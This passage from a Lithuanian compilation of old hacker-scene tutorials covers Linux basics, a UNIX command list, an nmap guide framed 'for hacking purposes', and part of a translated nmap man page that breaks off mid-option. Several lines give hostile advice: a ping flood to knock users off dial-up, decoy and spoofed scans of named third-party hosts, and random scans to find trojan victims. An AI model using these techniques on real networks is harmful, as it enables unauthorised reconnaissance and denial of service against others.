Atrodytu butu viskas labai shaunu, bet su nukilintu frame’u dingsta ir jusu domenas narshykles adress bare (ten lieka jusu tikrojo puslapio adresas.). nemanau, kad tai tenkina mus, todel yra ir kitas budas. ish pradzhiu pasidarome www.namezero.com accounta. Savo accounto viduje rasi skiltele „Home Page”.

Ten yra nustatomas tikrasis jusu domeno adresas „Actual URL”, Keyworday „Keywords” ir Aprashymas „Description”.i actual URL bei KeyWords rashykit ka tik norit. Mus reikia butent descriptnion, kurio textas naudojamas banerio fraime. Shtai ka jums teks ten irashyti: „>

33. Linux Naujokams

Trumpas Linux totorial`as naujokams

Turinys:

1. Kas yra Linux?

2. Kodel atsirado Linux?=-

3. Linux instaliavimas

4. Linux komandos

5. Linux konfiguravimas

6. Kas yra Xwindows?

1. Kas yra Linux?

Linux yra Unix tipo operacine sistema, skirta tinklo kompiuteriams (aisku gali buti ir ne tinklo kompiuteriuose). Linux yra registruotas prekinis zenklas Linus’o Torvalds’o (Linus Torvalds) operacines sistemos, kurios branduoli jis (su draugais) parase 1991 metais. Linux daugiaprogramine (multitasking) ir daugiavartotojine sistema. Kiekvienas vartotojas turi atskiras teises. Linux yra gan saugi OS. Linux yra pirmoji operacine sistema parasyta uz JAV ribu.

2. Kodel atsirado Linux?

Seniau Unix tipo operacines sistemos buvo gan brangios ir buvo sunku gauti jos pradinius kodus arba nebuvo ju galima keist. Tad vienas studentas suomis, Linus Torvalds sugalvojo parasyti savo operacines sistemos branduoli, kuris butu laisvai platinamas, butu galima keisti jo pradinius kodus ir t.t.

Tad X-o desimtmecio pradzioje pasaulis isvydo nauja OS, kurios branduoli sudare 10 000 Linus`o parasytu C kalbos eiluciu. Kiekvienas galejo laisvai gauti sio branduolio koda, kiekvienas galejo ji tobulinti, taisyti klaidas. Ir stai- greitai Linux populiarumas pradejo augti. Vis dazniau ji imta naudoti serveriuose. Daugelis programuotoju ja tobulina. Beje, visa tai jie daro dykai, savo ir kitu labui.

3. Linux instaliavimas

Patarimas: jei jus norit tureti be Linux savo kompiuteryje ir windows- pirmiau instaliuokite windows (nepamirskit palikti atskira skirsni Linux), o poto Linux.

Visu pirma norint instaliuoti Linux, reikia apsispresti kokia Linux distribucija instaliuosite. Ju yra daugelis: Debian, RedHat, Open Linux, Mandrake, SlackWare ir kt. Jos skiriasi savo programu paketais ir siektiek savo konfiguravimu. RedHat dazniausiai naudojama pradedanciuju, nes joje yra rpm- greitas, patogus programu instaliavimo budas.

Apsisprendus kokia distribucija naudosit reikia is Linux CD pasidaryti pakrovimo diskeli (dazniausiai su programa rawrite.exe).

Instaliavimas pradedamas uzkrovus kompiuteri is to diskelio. Tada reikia nurodyti is is kur instaliuosite (kieto disko, tinklo, cdrom), kokia kalba naudosite, kokia klavetura turite ir pan.

Linux`ui skirtingai nei MS-DOS, windows reikia ne vienos particijos, o maziausiai dvieju: root particijos ir swap particijos. root particijoj laikomas Linux branduolys ir kiti jam reikialingi failai. swap particija naudojama laikiniems failams kuriti, taip kaip windows`u swap failas. Swap particija geriausiai kutri dvigubai didesni nei jusu RAM kiekis.

Tada kompiuteris gales vykdyti programas kurioms reikia daugiau atminties negu jusu RAM. Jei jus instaliuosite Linux tik i sias dvi particijas jusu sistema bus tarsi skardineje. Norint kad taip nebutu reikia sukurti daugiau particiju: /home, /tmp, /usr. /home particijoj saugomi visi vartotoju failai, tad jo dydis priklauso nuo vartotoju skaiciaus ir ju poreikiu. /tmp particija panaciai kaip ir swap particija laiko laikinus failus.

Skirtumas tas kad tmp particijoje laikomi paciu programu laikini failai, o ne branduolio (kernel). /usr particijoje saugoma visos nesistemines programos, bei kiri joms skirti failai. /usr particijos dydis priklauso nuo vartotoju reikalingu programu, bet is patirties zinau kuo daugiau skirsite siam skirsnui vietos tuo geriau.

Beje, patarimas: Is karto apgalvokite ko jus norite, kiek viskas gali uzimti ir t.t., nes:

1.jei skirsnis (ypac /tmp) koks prisikemsa tai tada linux`as veikia kaip ant 386.(dazniausiai isvis luzhta)

2. Persigalvojus nera jau taip lengva perskirstyri diska. Jei vienam skirsni pritruko vietos, o kitam jos yra, nubus lengva is vieno skirsnio vieta perduoti kitam.

Mano disko suskirstymas atrode taip:

/ 150 MB – slesas reiskia root particija.

/tmp 100 MB – tmp particija

100 MB – swap particija neturi mount point`o (pavadinimo pvz. /; /tmp ir t.t).

/home 300 MB – vartotojams skiriau 300 MB (turint omeni, kad ju bus tik du).

/usr 3 GB- skyriau visa likusia disko vieta, nes zinau kad xwindows ryja vieta, o jei noresiu dar ir StarOffice.

Beje, visi skirsniai turi buti Linux Native failu sistemos, tik swap turi buti Linux Swap failu sistemos.

Suskircius diska lieka tik menkniekiai: nurodyti kuriuos paketus instaliuoti, nurodyti tam tikra savo hardware bei jos parametrus bei ivesti galiausiai root slaptazodi.

Is viso sito dar reiktu isskirti lilo konfiguravima. LILO (linux loader) yra programa kuri pasileidzia pries os uzkrovima ir pati uzkrauna linux, dos ar kita OS. Jei jusu Linux root skirsnis yra daugiau negu 500 MB nuo disko pradzios LILO (naujoms LILO versijoms giliai nusisivilpt tas 1024-as cilindras-dek kur nori) turite deti i MBR (master boot record), kitais atvejais galite deti kitur. Beto galite nurodyti kokia OS krauti pagal nutylejima, kokios bus OS zymes (Linux pagal nutylejima buna „linux”, windows- „dos”). Taigi jus jau Linux instaliavote i savo kompiuteri. Kaip ji pakrauti? Kai ijungiate kompiuteri isvystate kazka panasaus i:

LILO:

Ten surenkate norimos OS zyme ir spaudziate enter. Jei zymiu nezinot ar nepamenas paspauskoit tab ir jas isvysit.

4. Linux komandos

Is pirmo zvilgsnio Linux konsole yra tas pats kas ir DOS. Bet is tikro jos labai skiriasi. Konsoleje galime daryti visa ta pati ka ir DOS bei daug daug daugiau: kurti gerus sistemos scenarijus (skriptus), konfiguruoti Linux etc.

Cia pateikiu keleta Linux komandu be kuriu darbas su Linux negalimas:

cd (change directory)- pakeiskti aktyvu kataloga, dos analogas cd.

(atminkit kad Linux yra skirtumas tarp didziuju ir mazuju raidziu)

pwd (print working directory)- parodo aktyvu kataloga.

ls- isveda aktyvaus katalogo failu ir katalogu sarasa.

rm- istrina kataloga.

chsh (change shell)- keitce user`io shell passwd – pakeicia userio slaptavardi man (manual)- parodo komandos ar ko kitko aprasyma (manual).

linuxconf – linux sistemos konfiguravimas. [ne komanda, o programa, kitur gali nebut]

setup- linux paketu konfiguravimas, laiko, peles, garso kortos nustamas it t.t.

Kiti dalykai kurie pravers: ~ (tilde) – resikai jusu home kataloga. Tad jei norite gristi i savo home kataloga galite rasyti cd /home/tavo_useris/ arba cd ~. Na o jei rasysite cd ~user, tai jus busite perkeltas i user userio kataloga.

5. Linux konfiguravimas

Zinot Linux programuotoju posaki: „Kam programuoti jeigu galima konfiguruoti?”. Taigi Linux daug ka reikia atlikti paciam. Visi Linux konfiguraciniai failai yra /etc kataloge arba jusu home kataloge. Tu failu yra daugelis, tad as paminesiu tik keleta:

/etc/passwd – saugo informacija apie Linux vartotojus, ju home katalogus, shell`a ir kt.

/etc/shadow – saugo uzkuodotus vartotoju slaptazodzius.

.bachrc, .bashprofile – bash (Bourne Again SHell) shell`o konfiguraciniai failai.

Kaip konfiguruoti Linux placiau suziosite skaitydami how-to arba manual.

6. Kas yra xwindow?

xwindow yra grafinis linux apvalkalas (X Window linuxistai vadina XFree86, o tikrasis X Windows yra skirtas UNIXUI ir kitiems pobrangiem *IX’ams, jis juk ne nemokamas ), kuris leidzia dirbti su Linux vizualiomis priemonemis. X Window System, sutrumpintai vadinama X Window arba tiesiog X, yra paremta kliento/serverio architektura.

X serveris – grafikos, klaviaturos bei peles draiveriu visuma, leidzianti kelioms programoms (X klientams) rodyti bet ka atskiruose, gal but persidengianciuose languose. Pavyzdiai: XFree86 serveriai (XF86_SVGA, XF86_S3 ir t.t.), Metro X, Accelerated X. Visi X klientai yra lygus, bet vienas is ju lygesnis uz kitus. Jis vadinasi window manageriais.

Window managerio paskirtis – duoti kiekvienam langui remeli su pavadinimu, pora arba kelias desimtis mygtuku (uzdarymo, padidinimo ir t.t.), jis pirmas apdoroja klaviaturos bei peles paspaudimus ir leidzia langus nesioti, didinti, iskelti i prieki, aktyvuoti ir taip toliau.

Pavyzdiai: Enlightenment, kwm (i KDE), fvwm, Window Maker etc. Toliau lieka tik vartotojo programos. Jos, zinoma, galetu pacios keistis su X serveriu zemo lygio komandomis, bet daug paprasciau naudoti pilnavertes bibliotekas.

Sios biliotekos suteikiaivairiu standartiniu irankiu (vadinamu ‘widget’) – mygtuku, scrollbaru ir t.t. Pavydziai: Xaw (Athena Widget Set), Xaw3d, Motif, Gtk+, Qt. Galu gale beliko desktopai. Desktopo paskirtis – suteikti ivairioms programoms vienoda isvaizda ir naudojima (‘look and feel’). Paprastai desktopa sudaro biblioteka, window manageris ir kruvele bendros paskirties programu (paleidimo panele, failu tvarkykle ir t.t.). Pavyzdiai: CDE, KDE, Gnome.

Galvojo ir bade si teksta SaTaN, koregavo LivDea.

34. UNIX Naujokams

By Craft[Eye] www.underground.lt CraftEye@gmx.net

TAIGI FREE SHELLS(kai kuriu yra puslapiai, kai kuriems rashote newuser shelle prisijunge su telnet per 23 porta):

havoc.net – Niekas IRC botu neleis det.

pooki.smartec.com – Truputi letas.

nether.net – Labai gerai zhinomas. Taip pat labai uzhbaigtas, su juo gausite 3 megabaitus vietos. Telnete surinkite newuser.

nyx.net Turesi nusiusti maila tam, kad uzhsiregistruotum.

Negausi daug vietos diske.

suburbia.net Sysadminai parashe tinklo skaneri – ‘Strobe’.

cyberspace.org Originalus shellas – pradedantiesiems bus grazhus menu.

Ashpool.com Hmm shellas. =]

Arbornet.org Meshlas

TakiWeb.com Dar vienas shellas.

Kai kurios UNIX komandos ir trumpas aprashymas…

alias – leidzhia vartotojui pamatyti esamus aliasus bdiff – sujungia du didelius failus bfs – skanuoja dideli faila cal – parodo kalendoriu cat – parodo failo turini cc – c programavimo kalbos kompiliatorius cd – keicia direktorija chgrb – keicia failo priklausomybe grupei chmod – keicia failo atributus chown – keicia failo priklausomybe useriui cmp – palygina du failus comm – sujungia du failus taip kad vienodos eilutes butu pashalinamos cp – kopijuoja faila i kita vieta cu – iskviecia kita unix sistema date – parodo tikslu laika ir data df – parodo visus prijungtus irenginius tavo mashinoje diff – ishspauzdina dvieju failu skirtumus du – parodo direktorijos ishnaudojima vieta blokais echo – ishveda teksto eilute ed – paprastas tekso redaktorius env – nustato aplinkos kintamuosius ex – tiesiog kitas teksto redaktorius expr – apsluates a mathmatical formula find – randa faila f77 – fortrano programavimo kalbos kompiliatorius format – paruoshia diskeli grep – ieshko duomenu tekste help – parodo pagalba kill – sustabdo veikianti processa ln – sukuria nuoroda tarp dvieju failu lpr – kopijuoja faila i paralelini printeri ls – parodo visus failus ir katalogus esanchius direktorijoje mail – leidzhia vartotojui siusti/gauti pashta mkdir – sukuria direktorija more – ishveda duomeu faila i ekrana mv – naudojamas tam, kad pervardintu ar perkeltu direktorijas nohup – leidzhia komandai veikti net tada kai tu isheini ish shello nroff – naudojamas tam, kad formatuoti teksta passwd – pakeichia tavo passworda pkgadd – instaliuoja nauja programa tavo mashinoje ps – parodo shiuo metu dirbanchius procesus pwd – parodo aktyvia direktorija kurioje tu dirbi rm – trina nurodyta faila rmdir – trina nurodyta direktorija set – parodo visu kintamuju esanchiu shell’e vardus setenv – nustato aplinkos kintamuosiu sleep – padaro veikenti procesa neaktyvu source – leidzhi paleisti faila ir pakeisti bet kurias pasikeitusias reikshmes faile sort – surushiuoja failus spell – ieshko rashybos klaidu norodytame faile split – padalina faila stty – nustato terminalo parametrus tail – ishspauzdina failo gala tar – nukopijuoja visus nurodytus failus i viena touch – sukuria nauja tuschia faila arba nustato laika/data failui troff – ishveda suformatuota ishvesti =]

tset – nustato terminalo tipa umask – nurodo nauja sukurimo mask’a uniq – palygina du failus uucp – unix i unix paleidimas vi – editorius per visa ekrana vipw – atidaro vi editoriu taip kaip password fiaila redagavimui volcheck – patikrina ar yra prijungtas diskelis prie tavo mashinos wc – skaichiuoja failo, zhodzhius, eilutes ir t.t.

who – informacija apie kita zhmogu online write – nusiunchia zhinute kitam vartotojui sleep – nieko nedaro tam tikra laiko tarpa logname – parodo logo varda dd – vygdo keitimus kopijuojant du – parodo kiek vietos sunaudota mount – montuoja failines sistemas cut – ishtraukia pasirinktas failu dalis fold – perkelia ilgas eilutes join – apjungia eilutes ish skirtingu failu od – dvejetainis dampas paste – apjungia failu eilutes pr – skaido failus i puslapius sort – rushiuoja duomenis failuose strings – ishgauna teksta ish failo sum – skaichioja galutine kotroline suma tr – keichia simbolius basename – ishgauna failo varda ish pilno kelio dirname – ishgauna direktorijos varda ish pilno kelio false – grazhina reikshme false(nedaro nieko 🙂

true – grazhina reikshme true(nedaro nieko 🙂

groups – ishveda duomenis apie vartotoju priklausomybe grupems hostname – parodo tikslius duomenis apie vartotoja nice – nustato esamo proceso prioriteta pathchk – patikrina kelius printenv – ishveda aplinkos kintamuosius stty – parodo arba pakeichia terminalo parametrus su – ledzhi tapti kitu vartotoju tee – sukuria keleta ishvedimo kanalu test – patikrina faila ir simboliu eilute tty – ishveda terminalo pavadinima uname – ishveda duomenis apie operacine sistema ir pan.

users – parodo dabar esanchius vartotojus prisijungusius prie sistemos who – pasako kokie vartotojai uzhregistruti ir t.t.

whoami – parodo kas per vienas(velnias;) tu esi man – parodo pagalba apie, bet kuria komanda – dazhniausiai naujoku naudojama komanda =]

! – pakartoja komandas

Network komandos:

telnet – telnetas tavo shelle who – parodo kas yra prisijunges prie LAN

netstat – prisijungimu statistikos finger – informacija apie tinklo vartotojus ping – skirta tikrinti ar yra ryshys su tam tikra mashina(daugelis naudoja ja kokiams nors serveriui pakabinti ar ishmesti ish dial-up, jei greitas ryshys tai suvede komanda ping -c 50000 127.0.0.1 tikriausiai dial-up niekada neatlaikys =)

ftp – leidzhia parsisiusti/siusti failus whois – informacija apie interneto mazgus nslookup – more informacija apie interneto mazgus dig – tas pats kas ir nslookup tik dar daugiau, jei panaudosite tinkamus raktus galite ishtraukti neblogos informacijos

—————-End Of Commands List

Na zhodzhiu dabar jau palieku ash jus vienus ir darykit ka jus norit su tuo UNIX – svarbiausia darykit…

Na shiam kartui tiek….

Craft[Eye] : UNIX rulezz if you rule UNIX =]

EOF

General Protection Fault…. Kernel Panic…

35. Nmap’o panaudojimas hack’o tikslais

1.Info

Jei rimčiau susidomėsite darbu su nmap’u, tuomet būtinai apsilankykite siame saite:

http://www.insecure.org/nmap.

2.Kas yra nmap’as ?

Nmap’as tai tinklo skenavimo programa.Jo pagalba jūs galite tikrinti savo, bei kitų tinklų saugumą.Tiksliau jūs galite skanuoti portus, bei suzinoti ar juos dengia koks nors firewall’as.Taip pat galima su nmap’u galima nustatyti kito kompiuterio operacinę sistemą, tereikia tik ip adreso ir aišku interneto ryšio.

3.Trūkumai ir bugai

Daugumą šiame dokumente aprašytas funkcijas galima atlikti tik iš root’o.Tai galima sakyti yra pats didžiausias šios programos trūkumas ar bugas.

4.Pradedam

Dokumentas parašytas pagal 2.3BETA14 versiją.

Primiausia reikia atsisiūsti šia programą.O poto atlikti šiuos veiksmus:

# cp nmap-2.3BETA14.tar.gz /usr/local/src

# cd /usr/local/src/

# gunzip nmap-2.3BETA14.tar.gz

# tar -xvf nmap-2.3BETA14.tar

# rm nmap-2.3BETA14.tar

# cd nmap-2.3BETA14/

# more INSTALL

# ./configure && make && make install

# rm -rf nmap-2.3BETA14/

Lets go !

5.Komandų sintaksė yra tokia

# nmap [skanavimo tipas(ai)] [opcijos]

5.1. Skanavimo tipai

Manau šis tipas hackeriams beveik nereikalingas.Nmap’as jungiasi prie kiekvieno

-sT porto iš eilės.Todel viskas loginama loguose ir tave tikrai suseks.Šis būdas yra tiksliausias bet ir pavojingiausias.TCP connect skanavimas.

Šis būdas jau saugesnis tačiau ne visada , pvz jei stovi firewall’as.Skanuojant tokiu būdu

-sS nėra padaromas TCP prisijungimas, o paprasciausiai nusiunciamas TCP SYN paketas kaip norint prisijungti ir laukiama atsakymo.TCP SYN skanavimas.

-sF, -sX, -sN

Tai saugesnis už TCP SYN skanavima bet turi vieną labai rimtą trūkumą.Nei vienas iš jų neveikia

Microsoft sistemoms.Stealth FIN, Xmas Tree bei Null skanavimo režimai.

-sU UDP portų skanavimas, beprasmiškas naujoms sistemoms.Ir trunka labai ilgai.

5.2 Bendrosios opcijos ( Štai ir pats smagumas prasideda)

-P0 Skanuoja išarto nebandęs prieš tai pinginti hosto.Reikalingas tokiems servams kurie neatsakinėja į ICMP echo request’us ( pvz. pop.takas.lt)

-O Zjbiškiausia nmap’o funkcija.Atpažįsta kompo OS pagal jo fingerprint’us.

-oN

Viską kas vyksta ekrane logina i nurodytą failą.

-iR Dar viena labai cool nmap’o funkcija.Pats nmap’as generuoja bet kokius ip adresus ir skanuoja nurodytus portus.Jei ieškote kokiu trojanų auku tiesiog rašykite nmap -sS -iR -p 1234(portas) 127.0.0.1.

-p

Galite nurodyti kuriuos ar kurį portą tikrinti.

-p 21,60-90,1243 — 21, visi nuo 60 iki 90 bei 1243 port

-D

Decoy skanavimas priverčia skanuojamą host’ą manyti, kad jį vienu metu skanuoja visi nurodyti decoy’iai. Hostų logai gali parodyti

5-10 skanavimų is unikalių IP adresų, bet kuris iš jų skanuoja iš tikro jie pasakyti negalės.

Reikia atskirti vien1 decoy nuo kito kableliais be tarpo, tarp jų gali įrasšyti ME, tai bus tavo IP adresas.Jei neįrašysi ME, tai nmap’as parinks vietą tavo IP pats.

Tik reikia prisiminti, kad decoy įrašyti hostai turi būti gyvi, kitaip gali uz-SYN-flood’inti taikinį.Beto labai nesunku bus surasti tave, jei tik tavo IP bus gyvas iš visų decoy’ų.

Reikia pasakyti kad kai kurie portų skanavimo detektoriai gali išviso uždrausti priėjimą skanuojantiems hostams.Todėl būtų linksma jei kartą nurodytumėt vieną iš decoy’ų pvz. 127.0.0.1

Decoy gali būti naudojamas kartu su ping, tikru portų skanavimu ar su OS nustatymu (-O).

-S

Kartais nmap’as gali nerasti jūsų adreso.Tokiu atveju galima naudoti -S funkciją su jūsų IP ir interfeisu kuriuo norite siūsti paketus.

Tokiu būdu galite nurodyti kieno nors kito ip adresą ir isdurti taikinį,

-e Interfeisas

Pvz. eth0, lo, ppp0 ir kt.

-g Nurodo is kokio porto skanuoti.

-T

Paranoid pats lečiausias skanavimo būdas, bet ir tiksliausias, Insane pats greičiausias, tačiau ne toks tikslus.

5.3.Pavyzdžiai

# nmap -sX -e lo -P0 -S 127.0.0.3 localhost

Xmas Tree būdu aš skanuoju savo localhost’ą apsimesdamas 127.0.0.3.Loopback interfeisu.Va ką rodo ipchains’ų logas:

Packet log: input DENY lo PROTO=6 127.0.0.3:37009 127.0.0.1:139

L=40 S=0x00 I=53682 F=0x0000 T=41 (#1)

Kernelis įsitiknęs kad jį skanuoja 127.0.0.3.

# nmap -sN -D microsoft.com,mail.takas.lt,ME -oN /tmp/mad -p 1-1024 -O mad.com

Null skanavimo režimu , panadodamas du decoy adresus, viską logina į /tmp/mad failą.Skanuoja nuo 1-1024 portus ir bando atspėti OS mad.com serverio.

6.Pabaigai

Na pvyzdžių man atrodo daug nereikia jei turite lakią fantaziją jų prisigalvosite patys.

Wrote by Z-Man (z-man@scientist.com)

Nmap network security scanner man page (Lithuanian translation)

36. Nmap (2

PAVADINIMAS

nmap – tinklo tyrinėjimo įrankis bei saugumo skeneris

SINTAKSĖ

nmap [skanavimo tipas(ai)] [opcijos]

APIBŪDINIMAS

nmap’as yra sukurtas tam, kad leistų sistemų administrato­

riams bei smalsiems individams skanuoti didelius tinklus, siekiant nustatyti kokie hostai yra veikiantys ir kokias paslaugas jie siūlo. nmap’as turi be galo daug skanavimo technologijų, tai: UDP, TCP connect(), TCP SYN (pusiau atviras), ftp proxy (bounce ataka), Reverse-ident,

ICMP(ping sweep), FIN, ACK sweep, Xmas Tree, SYN sweep, bei Null skan’as. Skanavimo Tipai sekcijoje rasite apie tai smulkesnės informacijos. nmap’as taip pat turi nemažai pažangių savybių, tokių kaip nutolusio kompiuterio (toliau vadinamo ‘remote’) (O)peracinės (S)istemos nus­

tatymas per TCP/IP fingerprintinima, stealth (vogtinis)

skanavimas, dinaminės pauzės ir retransimisijos skaičiavi­

mai, lygiagretusis skanavimas , nepasiekiamų host’ų nus­

tatymas skanuojant lygiagrečiu skanavimo metodu, decoy skanavimas, filtruojamų portų nustatymas, tiesioginis RPC

skanavimas, fragmentinis skanavimas, bei labai lankstus taikinio ir portų nurodymas.

nmap’o autorius stengiasi kaip galima daugiau įvairių nmap’o galimybių suteikti ne tik root vartotojui, bet ir paprastam sistemos vartotojui, deja daugėlis kritinių sis­

temos branduolio (kernel) interfeisų (tokių kaip „raw socket’ai”) reikalauja root’o privilegijų, todėl nmap’as turėtų būti naudojamas root’u kai tik įmanoma.

nmap’o naudojimo rezultatas dažniausiai būna paprasčiau­

sias sąrašas įdomių portų, rastų skanuojamoje mašinoje(se). Nmap’as visada parodo kokią paslaugą (ser­

vice) teikia portas, jo numerį, būseną bei protokolą.

Būsaną nusako vienas iš trijų žodžių: „open”, „filtered”, „unfiltered”. „open” (atviras) reiškia, kad taikinys leis prisijungti prie šito porto. „filtered” (filtruojamas)

reiškia, kad firewall’as (ugnies siena), filtras ar dar kažkoks įdomus įrankis dengia portą, dėl to nmap’as tikl­

siai negali nustatyti ar portas atviras. „unfiltered”

(nefiltruojamas) parodo, kad portas yra tikrai „closed”

(uždarytas) ir nera dengiamas jokio firewall’o/filtro.

Nefiltruojamas portas yra gan įprastas atvėjis ir yra rodomas tik tuo atveju, kai dauguma iš skanuotų portų yra filtruojami.

Priklausomai nuo to, kokios opcijos naudojamos, nmap’as taip pat gali parodyti ir nutolusio kompiuterio:

(O)peracinę (S)istemą, TCP susekamumą, vartotoju vardus, kuriems priklauso tam tikri procesai, DNS vardus ir dar vieną kitą.

OPCIJOS

Prasmingos opcijos visos gali būti rašomos kartu (t.y.

vienoje eilutėje). nmap’as stengsis pasakyti, kokias klaidas esate padarę (aišku jei esate :).

Jei esate nekantrus, galite iškarto šoktelti į sekciją pavyzdžiai gale dokumento, kur gan aiškiai parodo naudo­

jimą. Taip pat galite paleisti nmap -h ir pamatysite pagrindines opcijas, su trumpais aprašymais.

SKANAVIMŲ TIPAI

-sT paprasčiausias TCP connect() skanavimas. Jūs ban­

dote prisijungti prie kiekvieno porto iš eilės. Jei portas klausosi, nmap’as prisijungia prie jo, taigi jei host’as logina, jis matys, kad bandote jungtis.

Šis metodas yra tiksliausias, bet rekomenduočiau jį naudoti tik tuo atveju, jei skanuojate savo ar draugo kompiuterį, t.y. tokį, dėl kurio vėliau tikrai nesusilauksite nemalonumų.

-sS TCP SYN skanavimas, kitaip dar dažnai vadinamas kaip „pusiau-atviras” skanavimas, nes nėra padaro­

mas TCP prisijungimas. Jūs paprasčiausiai nusiunčiate TCP SYN paketuką kaip kad norėdamas prisijungti ir laukiate atsakymo. Pakankamai neblo­

gas metodas, bet jei yra filtruojamų portų (pvz.

pastatytas firewall’as) ir host kompiuteris juos logina, – būsite pastebėtas.

-sF -sX -sN

Stealth FIN, Xmas Tree bei Null skanavimo režimai.

Tai yra šiek tiek saugesni skanavimo būdai nei TCP

SYN (pastebimumo atžvilgiu), bet deja nei vienas iš jų neveikia M$ sistemoms. Iš kitos pusės, tai nebloga priemonė, kurios pagalba galima nustatyti ar tai M$ sistema ar ne, t.y. jei -sF -sX arba -sN

parodo, kad visi portai uždaryti, o -sS rodo kelis atvirus portus, taikinys greičiausiai windows dėžutė.

-sP Tai paprasčiausias ping’as, kuris parodo kurie hostai tinkle yra gyvi. Atliekama paprasčiausiai siunčiant ICMP echo prašymą (request). Deja kai kurie saitai (kaip mail.takas.lt) blokuoja prašymus. Kad iš tikro įsitikinti, ar hostas negy­

vas, nmap’as nusiunčia ir TCP ack paketuką į 80

(standartiškai) portą. Jei gauname atgal RST, reiškia hostas gyvas. Pagal standartą (r00t’ui)

nmap’as naudoja abu ICMP bei ACK metodus. Pakanka­

mai efektyvu, nes vienu metu galite patikrinti #n hostų.

-sU UDP skanavimas. Naudojamas tam, kad nustatyti kokie

UDP (User Datagram Protocol, RFC 768) portai yra atviri.

Kai kurie mano, kad UDP skanavimas yra beprasmiškas, bet jį prisiminti verta vien dėl vienos Solaris rcpbind skylės. Taip pat yra cDc

Back Orifice trojanas, kuris atsidaro UDP portą ant window’sų. Gaila tik, kad UDP skanavimas kartais gali trukti labai ilgai.

-sA ACK skanavimas: šitas metodas paprastai yra naudo­

jamas tam, kad išsiaiškinti firewall’ų (ugnies sinų) taisykles. Jis gali padėti nustatyti ar fire­

wall’as tikras, ar paprasčiausias paketų filtras, blokuojantis įplaukiančius SYN paketukus.

-sW Window skanavimas. Šis skanavimo būdas labai panašus į ACK skaną, skirtumas tik tas, kad šis skanavimo metodas kartais parodo ir atvirus portus

(ACK jų nerodo).

-sR RPC skanavimas. Praskanavus parodoma kokia programa ir jos versija laiko RPC portus atvirus.

-b

Dar vienas pakankamai originalus skanavimo būdas, t.y. pasinaudojant ftp proxy serveriu. formatas gali būti useris:passwor­

das@serveris:portas . Viskas išskyrus serverį yra nebūtina.

BENDROSIOS OPCIJOS

Nei viena iš šių nėra būtina, bet kai kurios gali būti pakankamai naudingos

-P0 Skanuoti iš kart, nepabandžius iš pradžių ping’int serverio. Tai naudinga skanuojant tokius kaip mail.takas.lt, kurie neatsakinėja į ICMP echo request’us. Tokiu atveju reikėtų naudoti -P0 arba

-PT80.

-PT Naudoti TCP „ping’ą” vietoje standartinio ICMP

ping’o. Naudinga tokiais atvejais, kai serveris neatsakinėja i ICMO echo request’us. Taip pat gal­

ima naudoti kartu su postu (-PT).

-PS Naudoja SYN (prisijungimo prašymą) vietoje ACP

-PI Paprastas ping’as + suranda subnet’o broadcast’u adresus tinkle.

-PB Standartinis ping’inimo metodas: naudoja ACP bei

ICMP ping’us kartu. Geriausia būdas patikrinti firewall’us, kurie blokuoja vieną iš jų.

-O Viena geriausių nmap’o ypatybių – serverio OS’o atpažinimas pagal jo fingerprint’us (jei atvirai, pats nelabai žinau kas per biesas tie finger­

printai).

-I Įjungiamas TCP reverse ident skanavimas. Kaip 1996

Dave’as Goldsmith’as pastebėjo, ident protokolas (rfc 1413) leidžia pamatyti, kokiam useriui prik­

lauso procesas, kuris naudoja TCP susijungima.

Taigi, tu gali pvz prisijungti prie 80 porto ir tada pasinaudojes inentd’u, gali pamatyti ar http serveris yra paleistas root’u ar kokiu kitu userium.

-f Skanuojant SYN (-sS) , FIN (-sF), XMAS (-sX) arba

NULL (-sN) metodu, naudojami labai mažyčiai sufrag­

mentuoti IP paketai.

-v Verbose mode. Labai rekomenduojama opcija, ypač jei norit geriau suprasti kas čia dedasi. naudodamas šią opciją du kartus, efektas bus dar geresnis.

Gali naudoti ir dvigubą -d, efektas – nerealus.

Nepabandęs, nesuprasi.

-h Jei norite kad nedidelis langelis jums trumpai primintu kelias pagrindines komandas, ši opcija –

jums.

-oN

Viskas, kas vyksta ekrane bus loginama į „logas”

failą.

-oM

Viskas, kas vyksta ekrane bus loginama į failą „logas” „šiek tiek” kitokiu formatu.

-oS

Logina į failą „logas” kažkokiu nauju s|

Skanavimas, kuris buvo nutrauktas su ^C, gali būti pratęstas, su sąlyga, kad viskas buvo loginama su

-oN arba -oM opcija. Daugiau jokie parametrai negali būti pateikti (jie bus tokie, kokie buvo naudojami loginant). nmap’as pradės skanuoti nuo sekančios mašinos, po tos, kuri paskutinė buvo sėkmingai nuskanuota..

-iL

Nuskaito hostus (IP adresus) iš failo „failas”.

Hostai faile turi būti atskirti tarpais, TAB’ais arba atskirose linijose. deja opcijų nurodyti jokių negalite tame faile, užtat yra galimybė jas nurodyti komandinėje eilutėje.

-iR Šita opcija priverčia nmap’ą generuoti atsitik­

tinius hostus. Jei kada neturėsite ką veikti, pabandykite `nmap -sS -iR -p 80′, kad surastumėte keletą www serverių.

-p

Galite nurodyti kurį/kuriuos portus tikrinti. pvz.

-p 110 patikrins ar hostas turi pop3 serverį, taip pat galite mišriai nurodinėti portus:

-p 21,60-90,1243 — 21, visi nuo 60 iki 90

bei 1243 portas

-p 1- — visi portai nuo 1 iki

65535.

-F Greitasis metodas. Skanuoja tik tuos portus, kurie nurodyti nmap’o services faile (pagal default’ą –

/usr/local/lib/nmap/nmap-services)

-D

Decoy skanavimas priverčia skanuojamą host’ą manyti, kad jį vienu metu skanuoja visi nurodyti decoy’iai. Hostų logai gali parodyti 5-10 skanavimų iš unikalių IP adresų, bet kuris iš jų skanuoja iš tikro jie pasakyti negalės.

Atskirk kiekvieną decoy’į kableliais (be tarpo) ir gali tarp jų įterpti ‘ME’ kaip vieną iš decoy’ių.

nmap’as ten įterps tavo adresą. Jei šito nenurodysi, nmap’as atsitiktinai išrinks tau vietą.

Tiesa, jei ‘ME’ įrašysi 6-oje ar dar vėlesnėje vietoje, kai kurie skanavimų detektoriai (tokie kaip Solar Designer’io nepakartojamas scanlog dae­

mon’as) gali tavo IP išviso neparodyti.

Nepamiršk, kad hostai, kuruos naudosi kaip decoy’ius, turi būti gyvi, kitaip gali už-SYN-

flood’inti taikinį, o be to labai nesunku bus surasti skanuotoją, jei jis bus vienintelis gyvas visame tinkle.

Atkreipk dėmesį ir į tai, kad kai kurie (durnesni)

portų skanavimų detektoriai gali aplamai skanuo­

jantiems host’ams uždrausti priėjimą. Įsivaizduok, kas gali nutikti, jei vieną iš decoy’ių nurodytum „localhost’ą” 🙂

Decoy skanavimas gali būti naudojamas kartu su ping (naudojant ICMP, SYN, ACK, ar dar ką nors) arba tikru portų skanavimu bei bandant surasti remote

OS’ą ( -O ).

-S

